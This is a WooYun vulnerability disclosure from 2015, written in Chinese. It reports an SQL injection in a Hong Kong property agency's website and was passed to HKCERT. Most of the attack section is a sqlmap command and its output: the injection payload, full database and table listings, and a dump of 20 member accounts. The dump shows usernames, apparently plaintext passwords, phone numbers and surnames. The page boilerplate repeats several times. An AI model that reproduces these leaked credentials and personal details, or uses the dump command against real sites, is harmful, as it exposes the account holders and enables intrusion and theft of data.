恆業地產某站點存在SQL插入攻擊（4萬多地產信息泄露/大量用戶密碼泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153318

漏洞标题：恆業地產某站點存在SQL插入攻擊（4萬多地產信息泄露/大量用戶密碼泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-10 16:24

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-10：细节已通知厂商并且等待厂商处理中
2015-11-20：厂商已经确认，细节仅向厂商公开
2015-11-30：细节向核心白帽子及相关领域专家公开
2015-12-10：细节向普通白帽子公开
2015-12-20：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

於一九九四年八月成立，創辦人全部均曾在香港著名的地產代理公司任職，專責店舖租賃及銷售工作，經驗豐富。
恆業創辦初期，由於資金不足，只租用旺角通菜街威達商業中心的 800呎的辦公室，但憑著創辦人的專業知識及服務精神，業務得到迅速的發展，而再加上上下齊心，期間公司當年更促成大小店舖總值超越三億港元。很高興地恆業地產藉著有一個很好的開始，兩年後已可以租用亞皆老街113號約2000呎的全新寫字樓，在那裏我們還驕傲地促成當年內全港最大宗的店舖買賣「旺角好望角七連舖」，價值港幣四億多元，在那時公司員工已增至20多人以協助公司推廣業務。一九九九年七月，公司為使各部門得以擴充，毅然租用旺角凱途發展大廈13字樓全層，面積還比亞皆老街舊址大一倍，進一步拓展商舖業務，至目前為止，經由敝公司促成買賣之金額已近30億港元了。
作為一間專業的店舖地產代理，我們在短短數年間便在行內站穩腳來，並且在大部份客人心目中地位高崇，這當然有賴各大小客人多年來鼎力支持，但公司的沉實穩健作風及各級同事的努力亦不無關係。
說到公司作風，我們的辦事方式及手法都以正統公司的做法，絕不左道旁門，說假弄虛，不用違法的手段，事事以顧客為先，注重售後服務，而且處事低調，甚得客人賞識，加上我們只論耕耘，不論收獲，任何查詢均樂意回覆。另一方面本公司配備有完善的電腦系統，豐富的盤源，每分每秒在變動中的舖位市場叫價及成交價均可按時透過週報傳真給客戶，所有最新的舖位市場資料，客戶及業主們只須安坐家中便能得悉第一手的舖市消息。在租務方面，本公司擁有全港超過80%以上知名租客的聯絡，只要透過電腦網絡很輕易及快捷地便可替業主在最短的時間內把空置的舖位租出，減少空置的損失。在舖位買賣市場方面，我們和大部份的活躍買家，炒家，長短線投資者都有很密切的接觸，關係良好，並且我們亦會不斷以電腦傳真方式推廣盤口予活躍買家，促銷力強勁，所以亦能替賣家在很短時間內以理想的價錢替他們售出物業。

详细说明：

地址：http://**.**.**.**/zh-cn/shopping-mall-inner/?id=73

python sqlmap.py -u "http://**.**.**.**/zh-cn/shopping-mall-inner/?id=73" -p id --technique=BT --random-agent -D ppal_db -T tbl_member -C username,password,phone,chinesename,temp_ip --dump

1. 用户密码泄露

Database: ppal_db
Table: tbl_client
[3137 entries]
+----------+
| password |

Database: ppal_db
Table: tbl_member
[20 entries]
+---------------+
| password      |

Database: ppal_db
Table: sys_user
[32 entries]
+------------------+
| password         |

由于网速太慢，选择最少的一个进行展示

Database: ppal_db
Table: tbl_member
[20 entries]
+----------+---------------+-----------+-------------+---------------+
| username | password      | phone     | chinesename | temp_ip       |
+----------+---------------+-----------+-------------+---------------+
| CNG2     | &_h1s67,.5$2d | NULL      | 吳先生         | NULL          |
| singtao  | st823928      | NULL      | NULL        | **.**.**.**    |
| CLEUNG   | uJo,A1GT@%(v  | 2300 1388 | 梁小姐         | **.**.**.** |
| JLAU     | &sp8t*og)+Fm  | 2300 1388 | 劉小姐         | **.**.**.** |
| WNG      | wng           | 2300 1388 | 吳先生         | **.**.**.** |
| ppal     | 411IzkTW-$ga  | 2300 1388 | 恆業地產代理      | **.**.**.**  |
| YNG      | Eh%[L02&6;S5  | 5190 0829 | 吳小姐         | **.**.**.** |
| STANG    | ]whkNiA*Ufpa  | 6017 6207 | 鄧小姐         | **.**.**.** |
| GTSANG   | !TWGDxt~lTrz  | 8108 3678 | 曾先生         | **.**.**.** |
| BCHOI    | guTVW;~!L9VR  | 8203 0003 | 蔡先生         | **.**.**.** |
| CLI      | rAEz(C1#fUA9  | 8226 5009 | 李小姐         | **.**.**.** |
| CNG      | KvtMdr7EFb.Z  | 8226 5059 | 吳先生         | **.**.**.** |
| CTANG    | D(bPV.lno?yr  | 8226 5072 | 鄧小姐         | **.**.**.** |
| AYIN     | EGB5?#385Tw2  | 8226 5132 | 殷小姐         | **.**.**.** |
| EKWOK    | f0&O*.m44UT^  | 8226-5073 | 郭小姐         | **.**.**.** |
| KCHU     | *s)7+s3&a5x.  | 82265132  | 朱先生         | **.**.**.** |
| KLEE2    | u3Cz;4^H)8q-  | 9075 8798 | 李小姐         | **.**.**.** |
| ACHAN1   | %XE8zoam}RWh  | 9637-8800 | 陳先生         | **.**.**.** |
| LBRYHAN  | 8.xpqay[eCd_  | 9666 9668 | 李先生         | **.**.**.** |
| ELEUNG2  | {Oqzh#w(Om+7  | 9782-8882 | 梁小姐         | **.**.**.** |
+----------+---------------+-----------+-------------+---------------+

2. 地产信息泄露

Database: ppal_db
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| tbl_landreg                           | 47142   |

Database: ppal_db
Table: tbl_landreg
[18 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| address_en      | varchar(127) |
| address_tc      | varchar(127) |
| consider        | bigint(20)   |
| district        | varchar(5)   |
| gf_gross        | int(11)      |
| gf_price_avg    | int(11)      |
| id              | bigint(20)   |
| nature          | varchar(5)   |
| other_gross     | int(11)      |
| other_price_avg | int(11)      |
| prop_num        | bigint(20)   |
| status          | int(11)      |
| street          | int(11)      |
| streetno        | int(11)      |
| tfa_gross       | int(11)      |
| tfa_price_avg   | int(11)      |
| transacdate     | date         |
| type            | int(11)      |
+-----------------+--------------+

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=73 AND 1063=1063
---
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
current user:    'ppal_dbusr@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'ppal_dbusr'@'localhost'
Database: ppal_db
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| tbl_landreg                           | 47142   |
| tbl_authorize                         | 11740   |
| tbl_property                          | 8398    |
| tbl_property_bak                      | 8111    |
| tbl_manuscripts                       | 6711    |
| tbl_daily_news                        | 5913    |
| sys_function_right                    | 5278    |
| tbl_message                           | 3207    |
| tbl_code_street                       | 3167    |
| tbl_client                            | 3137    |
| tbl_doctor                            | 872     |
| tbl_winfax_phonebook                  | 858     |
| tbl_draft_item                        | 621     |
| tbl_weekly_news                       | 513     |
| tbl_authorize_item                    | 298     |
| sys_user_group_right                  | 245     |
| tbl_man                               | 218     |
| tbl_code_bldg                         | 184     |
| tbl_business                          | 98      |
| tbl_code_district                     | 89      |
| sys_user_group                        | 38      |
| sys_user                              | 32      |
| tbl_content                           | 28      |
| tbl_draft                             | 22      |
| tbl_banner                            | 20      |
| tbl_member                            | 20      |
| sys_function                          | 19      |
| sys_function_group                    | 14      |
| tbl_FaxMan                            | 5       |
| tbl_code_newspaper                    | 3       |
| tbl_online_agency                     | 2       |
| tbl_manuscripts_head                  | 1       |
| tbl_staff                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1349    |
| SESSION_VARIABLES                     | 331     |
| GLOBAL_VARIABLES                      | 319     |
| GLOBAL_STATUS                         | 317     |
| SESSION_STATUS                        | 317     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 81      |
| TABLES                                | 81      |
| CHARACTER_SETS                        | 39      |
| STATISTICS                            | 37      |
| KEY_COLUMN_USAGE                      | 36      |
| TABLE_CONSTRAINTS                     | 36      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: ppal_db
Table: tbl_staff
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ppal_db
Table: tbl_client
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ppal_db
Table: tbl_member
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ppal_db
Table: sys_user
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-11-20 16:09

厂商回复：

已將漏洞報告給網站聯絡人

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153318

漏洞标题：恆業地產某站點存在SQL插入攻擊（4萬多地產信息泄露/大量用戶密碼泄露）（香港地區）

相关厂商：恆業地產

漏洞作者：路人甲

提交时间：2015-11-10 16:24

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153318

漏洞标题：恆業地產某站點存在SQL插入攻擊（4萬多地產信息泄露/大量用戶密碼泄露）（香港地區）

相关厂商：恆業地產

漏洞作者： 路人甲

提交时间：2015-11-10 16:24

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153318"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云